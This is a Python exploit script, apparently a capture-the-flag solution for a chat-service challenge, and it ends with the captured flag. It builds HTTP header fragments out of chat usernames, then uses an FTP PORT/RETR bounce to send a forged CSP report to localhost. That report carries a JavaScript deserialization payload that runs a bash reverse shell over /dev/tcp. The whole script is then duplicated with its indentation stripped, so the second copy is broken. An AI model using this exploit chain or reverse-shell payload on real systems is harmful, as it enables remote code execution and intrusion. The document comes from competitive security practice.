shpik-kr/harmony_chat.py

## harmony_chat.py
import websockets
import asyncio
import json
import socket

host = "ws://harmony-1.hackable.software:3380/chat"

payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'

def register(username):
    j = {"type": "register", "displayName": username}
    return json.dumps(j)

def new_channel(name):
    j = {"type": "new-channel", "name": name}
    return json.dumps(j)

def invite(chId, uid):
    j = {"type": "invite", "chId": chId, "uid": uid}
    return json.dumps(j)

def send_message(chId, msg):
    j = {"type":"message","chId": chId,"msg": msg}
    return json.dumps(j)

async def exp():
    async with websockets.connect(host) as main_ws:
        print("[+] Make Payload")
        await main_ws.send(register("tonikaku"))
        data = await main_ws.recv()
        await main_ws.recv()
        main_uid = json.loads(data)["uid"]
        print("uid:", main_uid)

        # Make Channel for exploit
        await main_ws.send(new_channel("exp"))
        data = await main_ws.recv()
        main_chId = json.loads(data)["channels"][0]["chId"]
        print("chId:", main_chId)

        async with websockets.connect(host) as g1_ws:
            await g1_ws.send(register("POST /csp-report?"))
            data = await g1_ws.recv()
            t = await g1_ws.recv()
            cli_uid = json.loads(data)["uid"]

            await main_ws.send(invite(main_chId, cli_uid))
            await main_ws.recv()
            await g1_ws.recv()

            await g1_ws.send(send_message(main_chId, "HTTP/1.1"))
            await g1_ws.recv()

        async with websockets.connect(host) as g2_ws:
            await g2_ws.send(register("Host"))
            data = await g2_ws.recv()
            await g2_ws.recv()
            cli_uid = json.loads(data)["uid"]

            await main_ws.send(invite(main_chId, cli_uid))
            await main_ws.recv()
            await g2_ws.recv()

            await g2_ws.send(send_message(main_chId, "localhost:3380"))
            await g2_ws.recv()

        async with websockets.connect(host) as g3_ws:
            await g3_ws.send(register("Content-Length"))
            data = await g3_ws.recv()
            await g3_ws.recv()
            cli_uid = json.loads(data)["uid"]

            await main_ws.send(invite(main_chId, cli_uid))
            await main_ws.recv()
            await g3_ws.recv()

            await g3_ws.send(send_message(main_chId, str(len(payload)+15)))
            await g3_ws.recv()

        async with websockets.connect(host) as g4_ws:
            await g4_ws.send(register("Content-Type"))
            data = await g4_ws.recv()
            await g4_ws.recv()
            cli_uid = json.loads(data)["uid"]

            await main_ws.send(invite(main_chId, cli_uid))
            await main_ws.recv()
            await g4_ws.recv()

            await g4_ws.send(send_message(main_chId, "application/csp-report"))
            await g4_ws.recv()

        async with websockets.connect(host) as g5_ws:
            await g5_ws.send(register("{\"csp-report\""))
            data = await g5_ws.recv()
            await g5_ws.recv()
            cli_uid = json.loads(data)["uid"]

            await main_ws.send(invite(main_chId, cli_uid))
            await main_ws.recv()
            await g5_ws.recv()

            # Space
            await g5_ws.send(send_message(main_chId, ""))
            await g5_ws.recv()

            await g5_ws.send(send_message(main_chId, payload))
            await g5_ws.recv()

        print("[+] Payload created.")

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("harmony-1.hackable.software",3321))
        s.recv(1024)
        s.send(f"user {main_uid}\n".encode())
        s.recv(1024)
        s.send(f"pass\n".encode())
        s.recv(1024)
        s.send(f"port 127,0,0,1,13,52\n".encode())
        s.recv(1024)
        s.send(f"retr {main_chId}".encode())
        s.close()
        print("[+] Done.")

asyncio.get_event_loop().run_until_complete(exp())

# DrgnS{FTPIsFun,ButFXPIsFunner!}

## scratchpad
TODO:
	import websockets
	import asyncio
	import json
	import socket

	host = "ws://harmony-1.hackable.software:3380/chat"

	payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'

	def register(username):
	j = {"type": "register", "displayName": username}
	return json.dumps(j)

	def new_channel(name):
	j = {"type": "new-channel", "name": name}
	return json.dumps(j)

	def invite(chId, uid):
	j = {"type": "invite", "chId": chId, "uid": uid}
	return json.dumps(j)

	def send_message(chId, msg):
	j = {"type":"message","chId": chId,"msg": msg}
	return json.dumps(j)

	async def exp():
	async with websockets.connect(host) as main_ws:
	print("[+] Make Payload")
	await main_ws.send(register("tonikaku"))
	data = await main_ws.recv()
	await main_ws.recv()
	main_uid = json.loads(data)["uid"]
	print("uid:", main_uid)

	# Make Channel for exploit
	await main_ws.send(new_channel("exp"))
	data = await main_ws.recv()
	main_chId = json.loads(data)["channels"][0]["chId"]
	print("chId:", main_chId)

	async with websockets.connect(host) as g1_ws:
	await g1_ws.send(register("POST /csp-report?"))
	data = await g1_ws.recv()
	t = await g1_ws.recv()
	cli_uid = json.loads(data)["uid"]

	await main_ws.send(invite(main_chId, cli_uid))
	await main_ws.recv()
	await g1_ws.recv()

	await g1_ws.send(send_message(main_chId, "HTTP/1.1"))
	await g1_ws.recv()

	async with websockets.connect(host) as g2_ws:
	await g2_ws.send(register("Host"))
	data = await g2_ws.recv()
	await g2_ws.recv()
	cli_uid = json.loads(data)["uid"]

	await main_ws.send(invite(main_chId, cli_uid))
	await main_ws.recv()
	await g2_ws.recv()

	await g2_ws.send(send_message(main_chId, "localhost:3380"))
	await g2_ws.recv()

	async with websockets.connect(host) as g3_ws:
	await g3_ws.send(register("Content-Length"))
	data = await g3_ws.recv()
	await g3_ws.recv()
	cli_uid = json.loads(data)["uid"]

	await main_ws.send(invite(main_chId, cli_uid))
	await main_ws.recv()
	await g3_ws.recv()

	await g3_ws.send(send_message(main_chId, str(len(payload)+15)))
	await g3_ws.recv()

	async with websockets.connect(host) as g4_ws:
	await g4_ws.send(register("Content-Type"))
	data = await g4_ws.recv()
	await g4_ws.recv()
	cli_uid = json.loads(data)["uid"]

	await main_ws.send(invite(main_chId, cli_uid))
	await main_ws.recv()
	await g4_ws.recv()

	await g4_ws.send(send_message(main_chId, "application/csp-report"))
	await g4_ws.recv()

	async with websockets.connect(host) as g5_ws:
	await g5_ws.send(register("{\"csp-report\""))
	data = await g5_ws.recv()
	await g5_ws.recv()
	cli_uid = json.loads(data)["uid"]

	await main_ws.send(invite(main_chId, cli_uid))
	await main_ws.recv()
	await g5_ws.recv()

	# Space
	await g5_ws.send(send_message(main_chId, ""))
	await g5_ws.recv()

	await g5_ws.send(send_message(main_chId, payload))
	await g5_ws.recv()

	print("[+] Payload created.")

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("harmony-1.hackable.software",3321))
	s.recv(1024)
	s.send(f"user {main_uid}\n".encode())
	s.recv(1024)
	s.send(f"pass\n".encode())
	s.recv(1024)
	s.send(f"port 127,0,0,1,13,52\n".encode())
	s.recv(1024)
	s.send(f"retr {main_chId}".encode())
	s.close()
	print("[+] Done.")

	asyncio.get_event_loop().run_until_complete(exp())

	# DrgnS{FTPIsFun,ButFXPIsFunner!}